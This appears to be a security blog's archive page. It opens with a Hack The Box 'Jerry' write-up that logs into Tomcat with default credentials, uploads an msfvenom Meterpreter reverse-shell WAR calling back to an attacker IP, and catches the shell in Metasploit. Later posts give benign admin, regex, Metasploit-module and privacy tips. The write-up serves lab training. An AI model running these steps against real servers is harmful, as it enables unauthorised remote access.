Hack the Box Jerry

Hack The Box – Jerry – Writeup

Jerry is a retired box from HTB so can only be done if you have a premium VIP account.

It shows the risks of leaving default credentials on installed services. The solution I’ve got here is fairly standard, and I’ve kept in a little extra in terms of thought processes which didn’t go anywhere, instead of just writing out how to get the flags.


The first step is to run an Nmap scan of the target and note that it only comes back with one port, running Apache Tomcat version 7.0.88 and Coyote JSP Engine 1.1.


As it looks like a web server, we can visit the site and confirm it looks like a base install of Apache Tomcat version 7.0.88.


The only thing to notice on this generic Tomcat page is a file path. It is worth noting in case we need to navigate around the file system at a later point.


Normally this might be the time to start running a tool like dirb or DirBuster to try and find what else is available on this server; however, some nice links are given to us in the top right as “Server Status”, “Manager App” and “Host Manager”. All 3 present us with a login box if we try to access them.


As this looks like a default install of Tomcat, let’s check to see if the default credentials have been changed. A quick Google search reveals a GitHub page with about 20 default passwords listed for Tomcat installs. If there were more than 20 we could use Hydra to automate trying them; however, as the passwords were short and simple enough, you can work through them manually very quickly.


Doing this with the Server Status module yields success for the login admin:admin.

There isn’t much to see on this page; the only thing which stands out is an out-of-date Java version, which isn’t directly vulnerable now but is worth noting for later if we get stuck.


Trying to log into the other modules now gives an HTTP 403 authorisation error instead of the password prompt from before. This is because the browser is still trying to log in with the admin:admin credentials from earlier, and while they register as a valid set of credentials, the admin account doesn’t have authorisation to access the other modules. There is no logout option on the site, so you need to clear your browser history to reset.


A different set of default credentials from GitHub is successful, and we can get into the Manager app using tomcat:s3cret.

There is plenty of interesting info on this page but the obvious place to start looking is the upload feature. Any functionality which gives us the ability to put our own files onto a remote server and execute them is a good candidate for further investigation.


If we can get a file onto the server which executes a reverse shell and connects back to us, we can use that as a foothold to get further into the system. Let’s use msfvenom to create this reverse shell in .war format, as that is most likely to be accepted by the uploader. We know the server is sending out HTTP traffic, so as a first choice we should look at using the HTTP reverse shell. Any protocol not blocked by the firewall is likely to work for this.


We need to set the msfvenom options for the Meterpreter payload with the IP and port of our local machine and give the output the name dodgyfile.war:

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.14.6 LPORT=4567 -f war -o dodgyfile.war


The .war file is going to have a .jsp file inside with a randomised name. This is in an effort to try to disguise it from virus scanners. It’s worth making a note of the name in case we need to manually visit it later. You can view the contents of the war file using any zip tool.


Now that we have the payload we should setup our machine to start listening in case the reverse shell gets activated as soon as we complete the upload.

Set up Metasploit as the listener by opening it and using exploit/multi/handler with a few parameters.


Set the local host to your network interface address (look it up using ifconfig if needed). Set the port to whatever was set in the payload previously.


Start the listener using exploit -j (-j puts the process into the background as soon as it starts).


Back on the target website, let’s try and upload our dodgy file. Fingers crossed there aren’t any extra security checks which might flag up the file (unlikely, but we won’t know until we try).


It looks like it has uploaded fine. Checking the Metasploit listener, the payload hasn’t run automatically, so we need to find out how to start it manually.


After a bit of clicking about and trying the features on the app manager page it looks like you can manually navigate to the .jsp we noted earlier to get it to execute.


As our listener was in the background waiting it caught the incoming connection and we can interact with it using:

sessions -i 1


To make things easier to navigate, use the shell command, then start enumerating and browsing for the required flags.


It is slightly disappointing that there is no privilege escalation required for this box, as your shell starts as the system account by default and you can go straight into the administrator account. The only small challenge left is to remember how to use quotes to see the contents of a text file with spaces in its name. Both flags are in the same text file.
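The defender’s side of the default-credential check above, added here and not part of the original writeup: a small Python audit of tomcat-users.xml that flags the two pairs the post tried (admin:admin and tomcat:s3cret), and flags them more loudly when the account also carries a Manager or Host Manager role. The sample XML and the deploy account are constructed.

```python
"""Audit a Tomcat tomcat-users.xml for the weakness the Jerry box shows:
default credentials on accounts that reach the Manager/Host Manager apps.
Added example, not from the original writeup; the sample file is constructed."""
import sys
import xml.etree.ElementTree as ET

# The default pairs the writeup tried; extend this set from your own list.
DEFAULT_CREDS = {("admin", "admin"), ("tomcat", "s3cret")}
# Tomcat's own role names that open the Manager and Host Manager apps.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}


def _local(tag):
    """Strip the XML namespace that Tomcat 8+ puts on tomcat-users.xml."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, issue) pairs; an empty list means nothing was found."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        # Tomcat reads the account from 'username' (older files use 'name').
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not password:
            findings.append((name, "empty-password"))
        if (name, password) in DEFAULT_CREDS:
            findings.append((name, "default-credential"))
            if roles & MANAGER_ROLES:
                findings.append((name, "manager-role-with-default-credential"))
    return findings


# Constructed sample file for the demo (not taken from the box).
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="admin" password="admin" roles="manager-status"/>
  <user username="deploy" password="R3placeWithALongUniqueSecret" roles="manager-script"/>
</tomcat-users>
"""

if __name__ == "__main__":
    # Pass a path to audit a real file; with no argument the sample is used.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_XML
    for user, issue in audit_tomcat_users(text):
        print(f"{user}: {issue}")
```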


Review of Udemy course – The RedTeam blueprint a unique guide to ethical hacking

Overview

RedTeam Nation – Brandon Dennis – Certificate of completion

The RedTeam Blueprint is a video course created by Brandon Dennis which aims to take anyone with no previous security knowledge and give them a good starting point from which to pursue a career in cyber security.

The course covers all the topics you would expect as well as a multitude of others such as the typical structure of red and blue teams, advice for applying for jobs and tips for passing the interviews.

Most courses I’ve seen in the past briefly advise learners to find a programming language they are comfortable with and take a separate course to improve their knowledge; however, Brandon’s course includes 2:30 of Python tutorials and 1:40 of Assembly. While this is only enough to cover the topics briefly, it is more than enough to get someone started with either language.


Brandon himself has completed the OSCP and is studying for the OSCE. It feels like his choice of topics, and how deep he goes into each, is aimed at someone who eventually wants to commit and study for the OSCP. The course would also be useful for someone looking at the CompTIA Security+ or the EC-Council CEH.

Pros

  • Far more in-depth than other courses I’ve seen which claim to take you from beginner to hacker.
  • Plenty of demonstrations showing the concepts discussed.
  • The course covers far more than just the technical aspect of cyber security.
  • Lots of extra resources provided with the lectures, such as templates or links for further reading.
    Extra resources attached to lectures
  • All the standard stages of a red team assignment are covered: reconnaissance, enumeration, exploit, pivoting, privilege escalation, persistence, covering tracks.
  • The teacher’s voice is clear and easy to understand.

Cons

  • The screen capture was recorded at a high resolution and is sometimes only legible if you have a good, steady internet connection which auto-selects 1080p. For some reason you cannot manually set it to anything higher than 720p, which means that on a weak connection you cannot see what is happening on screen.
    High resolution - hard to see console
  • The module regarding job hunting and salary is very specific to the USA. This isn’t Brandon’s fault and I wouldn’t expect him to tailor-make videos for every country, but it is worth noting if you are somewhere where the IT job market is very different from America’s.

Verdict

A very in-depth course and value for money if you buy it during a Udemy sale.

Check the up/down status of servers and services with a batch file

Here is a template for a batch file you can run on demand to check the up/down status of servers and services using the command prompt.

Most companies will be using some sort of automated tool for monitoring the status of their servers; however, if you don’t have the budget, or want something quick to use, here is something you can set up which pings as many servers or services as you want and outputs their status to a text file which can quickly be scanned to find out if any have gone down unexpectedly.

Or maybe you pushed out a Windows patch to all your machines and want to check everything has come back up after the reboots?

Instructions:

  • Copy and paste the script below into a text file and save it using any name but with a .bat extension.
  • Place it in c:\X\ (if needed you can change this location in the script).
  • Edit the bat file and replace #SERVER and #SERVICENAME with whatever you are checking. The service name can be found in the service’s properties.
  • It should look like the script below.
  • When you run the batch file it will output all the raw data into a file called servicestatus.txt, then clean it up and place the final output into a file called FinalReport.txt, which you can easily scan to see which servers haven’t responded to ping or which services are showing as stopped.

REM -------------------- SECTION 1 --------------------
REM This checker has 4 sections
REM Section 1 = Version details and notes
REM Section 2 = Pings a list of servers to ensure they are up
REM Section 3 = Contacts a list of services to ensure they are up
REM Section 4 = Takes the raw output of sections 2+3, removes unwanted lines, then outputs the results to FinalReport.txt
REM -------------------- SECTION 2 --------------------
REM One ping line per server; all raw output is appended to the same file
ping #SERVER1 >> c:\x\servicestatus.txt
ping #SERVER2 >> c:\x\servicestatus.txt
ping #SERVER3 >> c:\x\servicestatus.txt
REM -------------------- SECTION 3 --------------------
REM One sc query line per server and service; repeat a server's line for each service you want checked on it
sc \\#SERVER1 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER1 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER2 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER3 query #SERVICENAME >> c:\x\servicestatus.txt
sc \\#SERVER3 query #SERVICENAME >> c:\x\servicestatus.txt
REM -------------------- SECTION 4 --------------------
REM findstr /v drops every line containing any of the space-separated words, leaving the ping replies and the service STATE lines
findstr /v "statistics Packets Approximate Minimum TYPE WIN32 STOPPABLE SERVICE_EXIT_CODE CHECKPOINT WAIT_HINT" c:\x\servicestatus.txt > c:\x\FinalReport.txt
del "c:\x\servicestatus.txt" /f /q

Remove IP addresses from multiple log files

Log files can grow as large as you let them and if for any reason you need to redact the IP addresses they hold it’s often impractical to do it manually.

It can be automated using Notepad++ (a free text editor) with some clever regex.

There are 2 different methods: one using a simple regex which will do the job but will also remove some non-IP numbers which look similar in format to an IP address, and one using a longer regex which only matches numbers that can appear in an IP address.

Quick and dirty method

Here are some demo log files with thousands of IP addresses inside:


Launch Notepad++ and select search >> find in files >>


The quick and dirty regex is: (\d{1,3}\.){3}\d{1,3}

Set some replacement text, or leave it blank if you want to just delete the entries.

Set the directory which contains your log files and, most importantly, set the search mode to “Regular expression”. It’s set to “Normal” by default.


When you press “Replace in Files” every matching address is replaced, and it goes through all of the log files in the directory, saving you a lot of manual time and effort.

Regex explained:

(\d{1,3}\.){3}\d{1,3}

(\d{1,3}\.) finds any set of numbers 1-3 digits in length with a full stop at the end.

{3} repeats the previous regex 3 times.

\d{1,3} is similar to the first part and searches for a set of numbers 1-3 digits in length but with no full stop at the end.

The reason you cannot simply use (\d{1,3}\.){4} is because the last octet of an IP address doesn’t end with a full stop.

The problem with this quick regex is that it will also pick up numbers such as 999.999.999.999, which is not a valid IP. Depending on the contents of your log files this might not be a problem.

IP Specific regex

If the quick and dirty method doesn’t do exactly what you need you can use this much longer regex to specify the numbers which can appear in an IP address:

(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)

It will do mostly the same as the previous regex but is smart enough not to remove 999.999.999.999.
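The same two regexes applied from Python rather than Notepad++, as an added example that is not part of the original article; the log lines are constructed. It also shows one limit of the IP-specific regex that the article does not mention: because it is unanchored it can start matching inside a longer number such as 1999.1.1.1 (redacting the 99.1.1.1 part), so a word-boundary version is included as well.

```python
"""Redact IPv4 addresses from log files with the two regexes from the post.
Added example, not part of the original article; the log lines are constructed."""
import re
from pathlib import Path

# Quick and dirty: four 1-3 digit groups joined by dots (also hits 999.999.999.999).
QUICK_RE = re.compile(r"(\d{1,3}\.){3}\d{1,3}")

# IP specific: each octet limited to 0-255, exactly as in the post.
OCTET = r"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
STRICT_RE = re.compile(r"\.".join([OCTET] * 4))

# Same thing wrapped in word boundaries, so it cannot start matching in the
# middle of a longer number such as 1999.1.1.1 (STRICT_RE redacts 99.1.1.1 there).
STRICT_BOUNDED_RE = re.compile(r"\b" + r"\.".join([OCTET] * 4) + r"\b")

REPLACEMENT = "[REDACTED]"


def redact(text, pattern=STRICT_BOUNDED_RE):
    """Return (redacted_text, number_of_addresses_replaced)."""
    return pattern.subn(REPLACEMENT, text)


def redact_files(paths, pattern=STRICT_BOUNDED_RE):
    """Rewrite each file in place, like Notepad++'s 'Replace in Files',
    and return {path: replacements} so the run can be checked."""
    counts = {}
    for path in map(Path, paths):
        text, n = redact(path.read_text(encoding="utf-8"), pattern)
        if n:
            path.write_text(text, encoding="utf-8")
        counts[str(path)] = n
    return counts


# Constructed log lines: two real addresses and one number that only looks like one.
SAMPLE_LOG = """\
2019-03-01 10:00:01 client 192.168.1.10 GET /index.html 200
2019-03-01 10:00:02 client 10.0.0.254 POST /login 302
2019-03-01 10:00:03 sensor reading 999.999.999.999 (not an address)
"""

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        paths = [Path(tmp) / f"access{i}.log" for i in range(3)]
        for p in paths:
            p.write_text(SAMPLE_LOG, encoding="utf-8")
        print(redact_files(paths))  # 2 replacements per file
        print(paths[0].read_text(encoding="utf-8"))
```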


How to add a custom module to Metasploit

Metasploit comes with thousands of modules preinstalled but there is nothing stopping you from adding some brand new ones from the internet or altering existing ones.

Here is the method for taking an existing exploit and adding your own custom version of it to Metasploit, the same instructions can be adapted for adding a brand new exploit from the internet.

  • By default in Kali the modules are all stored in /usr/share/metasploit-framework/modules; it’s worth checking yours are there before we continue.


  1. Open up msfconsole and navigate to your modules folder.
  2. In this example we will be making a custom version of the ms02_056_hello.rb MSSQL exploit. Use the mkdir command to create a custom folder in a sensible location and copy the exploit into it using cp.
  3. Navigate to your custom folder and confirm the exploit copy is there.
  4. Open up the exploit using any editor (skip this if you don’t intend to make any changes and have found a module from the internet).
  5. Make the changes you want. In this example we have just changed the description as a demonstration. Save your new exploit.
  6. Use the mv command to give your exploit a custom name; this stops you accidentally confusing it with the original code in the future.
  7. Metasploit won’t be able to find your exploit until after you exit and reopen msfconsole. You’ll see a search error if you try before that.
  8. After closing and reopening msfconsole your code should be visible within Metasploit, to use just like the preinstalled ones.

Find Lenovo serial number using WMIC

 

It can be very annoying to try and find the serial number of your laptop only to realise it’s on a little sticker somewhere inaccessible, requiring you to hunt for a screwdriver to remove a panel, or forcing you to power down to remove the battery.

If you’ve had your machine for a while it’s possible the numbers on it have faded or the sticker has partly come off, forcing you to play a vague form of hangman to figure it out.

The serial number isn’t something most people care about, unless the laptop gets stolen or they are trying to check the warranty online. Trying to find the serial after you’ve lost your laptop isn’t going to be too successful, so it’s recommended to find it and make a note just in case.

If you do find yourself struggling to get the serial by looking at the sticker this might save you some frustration:

  1. open up an elevated command prompt
  2. Type “Wmic bios get serialnumber” and press enter

If the serial is registered in the BIOS it should be displayed on screen. I’ve tested the command successfully on various Lenovo laptops, and on both HP and Dell desktops.

If you are on a network you can query the serial of a remote machine using:

  • wmic /node:NameOfRemoteMachine bios get serialnumber

If you don’t have the correct permissions on the other machine, or have mistyped the computer’s name, you can expect to see this error:

WMIC error for no access or incorrect computer name

If you get unlucky and the serial isn’t in the BIOS you’ll get this error and start swearing as you head back to Google to find another method:

WMIC error for no entry in BIOS

Hiding the author name in WordPress

Following on from the previous article about not making the admin account easy to spot we can apply the same train of thought to a WordPress blog. The majority of blogs on this site have a single author (this blog included). That means it’s safe to assume that the author of all the articles is the user who has admin rights to the blog.

WordPress used to force people to manually add code to the functions.php file, which is attached to every theme; however, they must have noticed a lot of people doing it, as they’ve now added a nifty toggle on the site which you can use to hide the author’s name. Here’s how to find it:

  1. Once logged in to WordPress select “My Site” then “Customize”.
     Hiding the author name on blogposts
  2. Select “Content Options”.
  3. Untick the “Display author” box.
     Display author checkbox

Your posts should now have a blank space where the author used to be shown:

Author info hidden

Little tips and tricks like these won’t stop a determined attacker, but remember: the longer someone has to spend getting access to somewhere, the more likely they are to give up before getting what they want.


Untagging your tagged photos on Facebook, Instagram and Twitter

With the popularity of camera phones in recent years it’s very likely that anything you do on a night out with friends gets documented by someone else in either a photo or a video. Whilst your drunken dancing might be funny at the time and entertain all your friends, it might not make you look like a good candidate for a job in the future (unless that job is sloppy backup dancer).

If friends have uploaded the photos and tagged you in them it makes an interviewers life much easier when they search for your name to see what comes up.

The social sites don’t always make it obvious how to remove your tag from something, so here’s a how-to guide for Facebook, Instagram and Twitter.

How to Untag yourself from a photo on Facebook

  1. Log into Facebook and visit your activity log (little triangle in the top right corner).
     Facebook activity log
  2. Select “Photos”, then browse the results and check any media you want to untag yourself from.
     How to untag yourself from Facebook photos
  3. Select “Report/Remove Tags”.
  4. Select “I want the photo untagged” and then “Untag photos”.
     Remove tag from Facebook photo

How to untag yourself from an Instagram photo

Untagging yourself in Instagram is slightly more hassle as you need to be logged into the app on your phone or tablet, you cannot do it from their website.

  1. Open the app and go to your page by selecting the head and shoulders icon.
     Instagram head and shoulders icon
  2. Select the clipboard in the top right.
     Instagram clipboard icon
  3. This should bring up a page with all the photos you have been tagged in. Browse through them and tap on the one you would like to remove yourself from.
  4. Select the 3 dots near the bottom of the photo.
     3 dots, Instagram untag
  5. Select “Photo options” and then “Hide from profile”.

Note: this doesn’t remove the tag from the picture, but it does remove it from your profile, so people will have a harder time searching for it.

How to remove a tagged photo from Twitter

Now that Twitter is about more than just 140 characters you might find yourself tagged in a tweeted photo. Praise goes to the Twitter devs for making this one of the easiest sites to untag yourself from.

  1. Log into your Twitter account and navigate to the photo you are tagged in.
  2. Select the 3 dots at the bottom of the photo and select “Remove my tag from photo”.
     Remove yourself from a tagged Twitter photo

Note: this doesn’t remove the photo, it just removes your tag, which makes it more difficult for people to find it associated with your account.